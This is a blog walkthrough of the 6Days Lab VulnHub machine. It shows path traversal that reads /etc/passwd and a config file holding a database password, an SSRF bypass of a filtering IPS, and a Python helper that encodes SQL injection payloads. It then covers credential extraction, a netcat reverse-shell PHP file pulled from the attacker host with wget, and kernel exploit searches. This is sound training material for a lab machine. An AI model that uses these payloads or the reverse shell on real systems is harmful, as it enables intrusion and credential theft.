I"vÜ<h1 id="6days-lab-11">6Days Lab: 1.1</h1>
<h2 id="intro">Intro</h2>
<p>This is my walkthrough of the 6days lab vulnhub machine.  You can find this machine at <a href="https://www.vulnhub.com/entry/6days-lab-11,156/">6Days Lab</a>.  If you want to attempt to hack into this machine without spoilers, don‚Äôt read the rest of this walkthrough.</p>

<h2 id="located-machine-on-network">Located machine on network</h2>
<p>Once the victim machine was booted I performed a quick scan to identify what IP address the new machine received through DHCP.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre></td><td class="rouge-code"><pre>root@sengen-kali:~/vulnhub/6days# nmap 192.168.56.0/24 -sn

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-27 14:44 PDT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.1
Host is up (0.00017s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00013s latency).
MAC Address: 08:00:27:EF:D4:FC (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.104
Host is up (0.00019s latency).
MAC Address: 08:00:27:0B:78:6D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.90 seconds
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="performed-onetwopunch--nmap-scans">Performed onetwopunch / nmap scans</h2>
<p>Using the onetwopunch script which combines unicornscan and nmap I scanned the machine looking for open ports.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>root@sengen-kali:~/vulnhub/6days# ~/onetwopunch.sh -t target.txt -p all -n "-A -sV"
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Results indicated the following TCP/UDP ports were found.<br />
[*] TCP ports for nmap to scan: 22,80<br />
[!] No UDP ports found</p>

<p>Quick nmap scan also showed a filtered http-proxy port 8080</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre>root@sengen-kali:~/vulnhub/6days# nmap 192.168.56.104

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-27 15:57 PDT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.104
Host is up (0.00015s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
8080/tcp filtered http-proxy
MAC Address: 08:00:27:0B:78:6D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.63 seconds
</pre></td></tr></tbody></table></code></pre></div></div>

<p><b>So it appears that SSH and a Web port is open</b><br />
Navigated to the webpage and there‚Äôs a simple page with a promocode textbox and button.</p>

<p><img src="{{ site.url }}/assets/img/ctf/6days_lab_1.png" /></p>

<p>Using the code NONEEDFORPENTEST results in a response of:<br />
Code expired!</p>

<h2 id="viewing-source">Viewing source</h2>
<ul>
  <li>We see that the form submits to a php page called checkpromo.php</li>
  <li>We also see an interesting piece for the broken image on the page
    <ul>
      <li>&lt;img src=‚Äùhttp://192.168.56.104/image.php?src=https%3A%2f%2f4.bp.blogspot.com%2f-u8Jo4CEKQLk%2fV4OpiaoMJ7I%2fAAAAAAAAAiw%2f8kuCpTOpRWUAdp2p4GpegWdnOwxjwHNYQCLcB%2fs1600%2fphoto.jpg‚Äù /&gt;</li>
    </ul>
  </li>
</ul>

<h2 id="lfi-detected">LFI detected</h2>
<p>This image link is rather suspicious as it is being provided as a parameter to another php page call image.php (this often means an LFI or RFI could be possible).</p>

<p>I tried a number of LFI paths in the browser but received errors on the page but then tried them again with curl with success:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
</pre></td><td class="rouge-code"><pre>root@sengen-kali:~/vulnhub/6days# curl http://192.168.56.104/image.php?src=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
andrea:x:1001:1001::/home/andrea:/bin/andrea
</pre></td></tr></tbody></table></code></pre></div></div>
<p>The account andrea at the end is of interest so we‚Äôll keep that in mind.</p>

<h2 id="searching-for-other-files">Searching for other files</h2>
<p>The next thing was to see if we could get the other files that were referenced on the site to see what was in them.</p>

<p>checkpromo.php</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
</pre></td><td class="rouge-code"><pre>root@sengen-kali:~/vulnhub/6days# curl http://192.168.56.104/image.php?src=../../../../../var/www/checkpromo.php
&lt;?php
include 'config.php';

$conn = mysql_connect($servername, $username, $password);

if (!$conn) {
	die("Connection failed: " . $conn-&gt;connect_error);
}

$sql = "SELECT discount, status FROM promocodes WHERE promocode='".$_GET['promocode']."';";

mysql_select_db($dbname);
$result = mysql_query($sql, $conn);

if (!$result) {
	echo "Promocode not valid!";
} else {
	while($row = mysql_fetch_array($result, MYSQL_ASSOC))
	{
		if($row['status'] == 0)
			echo "Code expired!";
		else
			echo "You have %".$row['discount']." discount!";
	}
}

mysql_close($conn);
?&gt;
</pre></td></tr></tbody></table></code></pre></div></div>
<p>config.php</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>root@sengen-kali:~/vulnhub/6days# curl http://192.168.56.104/image.php?src=../../../../../var/www/config.php
&lt;?php
$servername = "localhost";
$username = "sellingstuff";
$password = "n0_\$\$_n0_g41ns";
$dbname = "fancydb";
</pre></td></tr></tbody></table></code></pre></div></div>
<p>image.php</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>root@sengen-kali:~/vulnhub/6days# curl http://192.168.56.104/image.php?src=../../../../../var/www/image.php
&lt;?php
$img = $_GET['src'];
header('Content-Type: image/jpeg');
readfile($img);
?&gt;
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="sql-injection">SQL Injection</h2>
<p>So from the above pages I have now gathered, my interest was in the SQL injection that seemed possible through the promocode field.  Although this is where things got a little tricky and not as straight forward as I expected.</p>

<p>The following is the SQL query that I tried to inject into:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nv">$sql</span> <span class="o">=</span> <span class="s2">"SELECT discount, status FROM promocodes WHERE promocode='"</span><span class="mf">.</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'promocode'</span><span class="p">]</span><span class="mf">.</span><span class="s2">"';"</span><span class="p">;</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>It seems like this should be an easy injection into this query so I start out with some basic injections to try to get a confirmation.</p>

<p>Starting with a single tick I get an error response with the message:
&lt;/i&gt;‚ÄúMalicious request blocked! ~Rashomon IPS‚Äù&lt;/i&gt;</p>

<p>I tried a number of of different things such as <code class="language-plaintext highlighter-rouge">' or 1=1 or 'a'='</code> but nothing worked.  I tried url encoding a tick as well (%27) and the result was it getting double url encoded at the destination (%2527)‚Ä¶ weird. Not sure what that is about.</p>

<p>I looked through the source again and realized I had not actually grabbed the default page of the site so did that:</p>
<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
</pre></td><td class="rouge-code"><pre>root@sengen-kali:~/vulnhub/6days# curl http://192.168.56.104/image.php?src=../../../../../var/www/index.php
<span class="nt">&lt;html&gt;</span>
<span class="nt">&lt;head&gt;</span>
<span class="nt">&lt;title&gt;</span>Rashomon IPS - Main Page<span class="nt">&lt;/title&gt;</span>
<span class="nt">&lt;/head&gt;</span>
<span class="nt">&lt;body&gt;</span>
<span class="nt">&lt;h2&gt;</span>Rashomon Intrusion Prevention System<span class="nt">&lt;/h2&gt;</span>
<span class="nt">&lt;h3&gt;</span>Become immune to every attack!<span class="nt">&lt;/h3&gt;</span>
Today we're announcing our brand new product, Rashomon IPS! <span class="nt">&lt;br</span> <span class="nt">/&gt;</span>
It's capable of blocking any <span class="nt">&lt;b&gt;</span>sophisticated cyber attack<span class="nt">&lt;/b&gt;</span> which <span class="nt">&lt;u&gt;</span>can harm your precious customers.<span class="nt">&lt;/u&gt;</span> (you don't want THAT to happen, do you?) <span class="nt">&lt;br</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">"http://&lt;? echo passthru("</span><span class="err">/</span><span class="na">sbin</span><span class="err">/</span><span class="na">ifconfig</span> <span class="err">|</span> <span class="err">/</span><span class="na">bin</span><span class="err">/</span><span class="na">grep</span> <span class="na">-Eo</span> <span class="err">'</span><span class="na">inet</span> <span class="err">(</span><span class="na">addr:</span><span class="err">)?([0</span><span class="na">-9</span><span class="err">]</span><span class="na">*</span><span class="err">\.){3}[0</span><span class="na">-9</span><span class="err">]</span><span class="na">*</span><span class="err">'</span> <span class="err">|</span> <span class="err">/</span><span class="na">bin</span><span class="err">/</span><span class="na">grep</span> <span class="na">-Eo</span> <span class="err">'([0</span><span class="na">-9</span><span class="err">]</span><span class="na">*</span><span class="err">\.){3}[0</span><span class="na">-9</span><span class="err">]</span><span class="na">*</span><span class="err">'</span> <span class="err">|</span> <span class="err">/</span><span class="na">bin</span><span class="err">/</span><span class="na">grep</span> <span class="na">-v</span> <span class="err">'127.0.0.1'</span> <span class="err">|</span> <span class="err">/</span><span class="na">usr</span><span class="err">/</span><span class="na">bin</span><span class="err">/</span><span class="na">tr</span> <span class="na">-d</span> <span class="err">'\</span><span class="na">n</span><span class="err">'");</span> <span class="err">?</span><span class="nt">&gt;</span>/image.php?src=https%3A%2f%2f4.bp.blogspot.com%2f-u8Jo4CEKQLk%2fV4OpiaoMJ7I%2fAAAAAAAAAiw%2f8kuCpTOpRWUAdp2p4GpegWdnOwxjwHNYQCLcB%2fs1600%2fphoto.jpg" /&gt; <span class="nt">&lt;br</span> <span class="nt">/&gt;</span>
(This guy is coming after your website!) <span class="nt">&lt;br</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;br</span> <span class="nt">/&gt;</span>
Don't waste your time and money by hiring <span class="nt">&lt;font</span> <span class="na">color=</span><span class="s">"#ff00cc"</span><span class="nt">&gt;</span>pentesters<span class="nt">&lt;/font&gt;</span> and doing real security audits. <span class="nt">&lt;br</span> <span class="nt">/&gt;</span>
This is the best way to secure your organization and you can completely rely on it, and only it! <span class="nt">&lt;br</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;br</span> <span class="nt">/&gt;</span>
IT'S SO SECURE WE EVEN USE IT ON OUR WEBSITE. <span class="nt">&lt;br</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;br</span> <span class="nt">/&gt;</span>
So be quick and get a <span class="nt">&lt;u&gt;</span>%15 discount<span class="nt">&lt;/u&gt;</span> on our newest product using the promocode <span class="nt">&lt;b&gt;</span>NONEEDFORPENTEST<span class="nt">&lt;/b&gt;</span>. (discount will be available until yesterday)<span class="nt">&lt;br</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;br</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;form</span> <span class="na">name=</span><span class="s">"promo"</span> <span class="na">method=</span><span class="s">"GET"</span> <span class="na">action=</span><span class="s">"checkpromo.php"</span><span class="nt">&gt;</span>
Apply your promo code here: <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"promocode"</span><span class="nt">&gt;</span>
<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"submit"</span> <span class="na">value=</span><span class="s">"Apply Promo"</span><span class="nt">&gt;</span>
<span class="nt">&lt;/form&gt;</span>
<span class="nt">&lt;/body&gt;</span>
<span class="nt">&lt;/html&gt;</span>
<span class="cp">&lt;?php

?&gt;</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<p>PHP is using the passthru function that can execute arbitrary commands, however, nothing in this allows for injection from us it seems.</p>

<p>So these sanitizations are happening on my input from the main page but perhaps if I make the same request through the image page it may change. One thing to note is that since the parameter is a URL it needs to be URL encoded and the parameter it has for promocode needs to be URL encoded (so this ends up being double URL encoded).</p>

<p>With this in mind‚Ä¶</p>

<p>The request I want to make is:
<code class="language-plaintext highlighter-rouge">curl http://192.168.56.104/image.php?src=http://127.0.0.1/checkpromo.php?promocode='</code></p>

<p>URL encoding the parameter results in:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>curl http://192.168.56.104/image.php?src=http%3a%2f%2f127.0.0.1%2fcheckpromo.php%3fpromocode%3d%2527
Malicious request blocked!
~Rashomon IPS
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Same error‚Ä¶ blocked.</p>

<p>Knowing about the potential proxy on 8080 that it may be able to use if the request was coming from local I add in the 8080 port to see if that makes a difference.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>curl http://192.168.56.104/image.php?src=http%3a%2f%2f127.0.0.1%3a8080%2fcheckpromo.php%3fpromocode%3d%2527
Promocode not valid!
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Success! It works while sending it a single tick which means I may have bypassed the Rashomon IPS filtering.</p>

<h2 id="making-testing-easier-through-a-custom-python-script">Making testing easier through a custom python script</h2>
<p>To make things easier to test since all this encoding needs to happen I wrote the below python code to assist in executing commands as I perform some trial and error SQL.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="rouge-code"><pre><span class="c1">#!/usr/bin/python3
</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">from</span> <span class="nn">urllib.parse</span> <span class="kn">import</span> <span class="n">quote_plus</span>

<span class="n">base_url</span> <span class="o">=</span> <span class="s">'http://192.168.56.104/image.php?src='</span>
<span class="n">proxy_url</span> <span class="o">=</span> <span class="n">quote_plus</span><span class="p">(</span><span class="s">'http://127.0.0.1:8080/checkpromo.php?promocode='</span><span class="p">)</span>
<span class="n">attack_string</span> <span class="o">=</span> <span class="n">quote_plus</span><span class="p">(</span><span class="n">quote_plus</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">])).</span><span class="n">replace</span><span class="p">(</span><span class="s">"-"</span><span class="p">,</span> <span class="s">"%252d"</span><span class="p">)</span>

<span class="k">print</span><span class="p">(</span><span class="n">base_url</span> <span class="o">+</span> <span class="n">proxy_url</span> <span class="o">+</span> <span class="n">attack_string</span><span class="p">)</span>

<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">os</span><span class="p">.</span><span class="n">popen</span><span class="p">(</span><span class="s">'curl '</span> <span class="o">+</span> <span class="n">base_url</span> <span class="o">+</span> <span class="n">proxy_url</span> <span class="o">+</span> <span class="n">attack_string</span><span class="p">).</span><span class="n">read</span><span class="p">().</span><span class="n">splitlines</span><span class="p">():</span>
    <span class="k">print</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>This now allows me to make a call like <code class="language-plaintext highlighter-rouge">./query.py "'"</code> which does the proper URL encoding for me.</p>

<p><b>1% discount</b><br />
With some trial and error I was able to get a 1% discount message as seen below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>root@sengen-kali:~/vulnhub/6days# ./query.py "' union select 1,'1"
http://192.168.56.104/image.php?src=http%3A%2F%2F127.0.0.1%3A8080%2Fcheckpromo.php%3Fpromocode%3D%2527%2Bunion%2Bselect%2B1%252C%25271
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    21  100    21    0     0   2966      0 --:--:-- --:--:-- --:--:--  3500
You have %1 discount!
</pre></td></tr></tbody></table></code></pre></div></div>

<p><b>0% - Sleep(1)</b><br />
Confirmed through a sleep that I was executing my select here:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>root@sengen-kali:~/vulnhub/6days# ./query.py "' union select sleep(1),'1"
http://192.168.56.104/image.php?src=http%3A%2F%2F127.0.0.1%3A8080%2Fcheckpromo.php%3Fpromocode%3D%2527%2Bunion%2Bselect%2Bsleep%25281%2529%252C%25271
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    21  100    21    0     0     20      0  0:00:01  0:00:01 --:--:--    20
You have %0 discount!
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="searching-for-valid-tables">Searching for valid tables</h2>
<p>Due to the sleep trick I could execute queries to test for valid table names.  If the table name was valid I would get the 1 second sleep, if it was invalid it would return immediately.</p>

<p>In the end, a ‚Äúusers‚Äù table was present:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>root@sengen-kali:~/vulnhub/6days# ./query.py "' union select sleep(1), 1 from users union select 1, '1"
http://192.168.56.104/image.php?src=http%3A%2F%2F127.0.0.1%3A8080%2Fcheckpromo.php%3Fpromocode%3D%2527%2Bunion%2Bselect%2Bsleep%25281%2529%252C%2B1%2Bfrom%2Busers%2Bunion%2Bselect%2B1%252C%2B%25271
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    42  100    42    0     0     41      0  0:00:01  0:00:01 --:--:--    41
You have %0 discount!You have %1 discount!
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="finding-valid-columns-and-ultimately-credentials-to-an-account-we-saw-earlier-in-the-etcpasswd-file">Finding valid columns and ultimately credentials to an account we saw earlier in the /etc/passwd file</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>root@sengen-kali:~/vulnhub/6days# ./query.py "' union select username, 1 from users union select 1, '1"
http://192.168.56.104/image.php?src=http%3A%2F%2F127.0.0.1%3A8080%2Fcheckpromo.php%3Fpromocode%3D%2527%2Bunion%2Bselect%2Busername%252C%2B1%2Bfrom%2Busers%2Bunion%2Bselect%2B1%252C%2B%25271
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    47  100    47    0     0  11895      0 --:--:-- --:--:-- --:--:-- 15666
You have %&lt;b&gt;andrea&lt;/b&gt; discount!You have %1 discount!

root@sengen-kali:~/vulnhub/6days# ./query.py "' union select password, 1 from users union select 1, '1"
http://192.168.56.104/image.php?src=http%3A%2F%2F127.0.0.1%3A8080%2Fcheckpromo.php%3Fpromocode%3D%2527%2Bunion%2Bselect%2Bpassword%252C%2B1%2Bfrom%2Busers%2Bunion%2Bselect%2B1%252C%2B%25271
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    56  100    56    0     0  19656      0 --:--:-- --:--:-- --:--:-- 28000
You have %&lt;b&gt;SayNoToPentests&lt;/b&gt; discount!You have %1 discount!
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="ssh">SSH</h2>
<p>So we now have some credentials (andrea / SayNoToPentests) and we‚Äôll give a shot at using them to SSH into the target machine.</p>

<p><img src="{{ site.url }}/assets/img/ctf/6days_lab_2.png" /></p>

<p>Success!</p>

<p>But we can‚Äôt seem to execute commands‚Ä¶.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>andrea@cypm:~$ ifconfig
andrea@cypm:~$ hostname
andrea@cypm:~$ uname -a
andrea@cypm:~$ pwd
andrea@cypm:~$ cd
rbash: cd: restricted
andrea@cypm:~$
</pre></td></tr></tbody></table></code></pre></div></div>

<p>No commands seem to be working and upon using ‚Äòcd‚Äô it becomes obvious we are in an rbash shell.</p>

<p><b>It seems we may be able to use wget so will try to get a reverse shell uploaded</b></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>andrea@cypm:~$ wget
wget: missing URL
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
</pre></td></tr></tbody></table></code></pre></div></div>

<p><b>Created php file to get a shell</b></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>root@sengen-kali:~/vulnhub/6day# cat shell.php
&lt;?php echo shell_exec("/bin/nc -e /bin/sh 192.168.56.101 443");?&gt;
</pre></td></tr></tbody></table></code></pre></div></div>

<p><b>Used wget to get it to the victim machine and put it in /var/www</b></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre>andrea@cypm:~$ wget http://192.168.56.101/shell.php
--2017-07-27 22:25:32--  http://192.168.56.101/shell.php
Connecting to 192.168.56.101:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
Saving to: `shell.php'

    [ &lt;=&gt;                                                                        ] 0           --.-K/s   in 0s      

2017-07-27 22:25:32 (0.00 B/s) - `shell.php' saved [0/0]

andrea@cypm:~$ cp shell.php /var/www
</pre></td></tr></tbody></table></code></pre></div></div>

<p><b>Listened on netcat for the connection and called the shell.php page</b>
<img src="{{ site.url }}/assets/img/ctf/6days_lab_3.png" /></p>

<p><img src="{{ site.url }}/assets/img/ctf/6days_lab_4.png" /></p>

<h2 id="escalation-to-root">Escalation to root</h2>
<p><b>Gained a better PTY</b></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>which python
/usr/bin/python
/usr/bin/python -c 'import pty;pty.spawn("/bin/bash");'
www-data@cypm:/var/www$
</pre></td></tr></tbody></table></code></pre></div></div>

<p><b>Checked some permission misconfigurations for quick kills</b></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>www-data@cypm:/var/www$ ls -l /etc/passwd
ls -l /etc/passwd
-rw-r--r-- 1 root root 1142 Jul 11  2016 /etc/passwd
www-data@cypm:/var/www$ ls -l /etc/shadow
ls -l /etc/shadow
-rw-r----- 1 root shadow 1023 Jul 11  2016 /etc/shadow
</pre></td></tr></tbody></table></code></pre></div></div>

<p><b>Gathered some kernel version information</b></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>www-data@cypm:/var/www$ uname -a
uname -a
Linux cypm 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
</pre></td></tr></tbody></table></code></pre></div></div>

<p><b>Did a searchsploit against the exact kernel version</b></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre>root@sengen-kali:~/vulnhub/6day# searchsploit 3.13.0
---------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                    |  Path
                                                                                  | (/usr/share/exploitdb/platforms/)
---------------------------------------------------------------------------------- ----------------------------------
Linux Kernel 3.13.0 &lt; 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privile | linux/local/37292.c
Linux Kernel 3.13.0 &lt; 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privile | linux/local/37293.txt
---------------------------------------------------------------------------------- ----------------------------------
</pre></td></tr></tbody></table></code></pre></div></div>

<p><b>Pulled down linuxprivchecker to get a report</b></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre></td><td class="rouge-code"><pre>www-data@cypm:/var/www$ ls -l /etc/shadow
ls -l /etc/shadow
-rw-r----- 1 root shadow 1023 Jul 11  2016 /etc/shadow
www-data@cypm:/var/www$ wget http://192.168.56.101/common/lpc.py
wget http://192.168.56.101/common/lpc.py
--2017-07-28 03:11:35--  http://192.168.56.101/common/lpc.py
Connecting to 192.168.56.101:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25304 (25K) [text/x-python]
Saving to: `lpc.py'

100%[======================================&gt;] 25,304      --.-K/s   in 0.001s  

2017-07-28 03:11:35 (34.0 MB/s) - `lpc.py' saved [25304/25304]

www-data@cypm:/var/www$ /usr/bin/python ./lpc.py
</pre></td></tr></tbody></table></code></pre></div></div>

<p><b>A number of possible exploits were listed by linux priv checker as well</b><br />
Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c<br />
Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**<br />
CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c<br />
CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c<br />
MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c<br />
open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c<br />
open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c<br /></p>

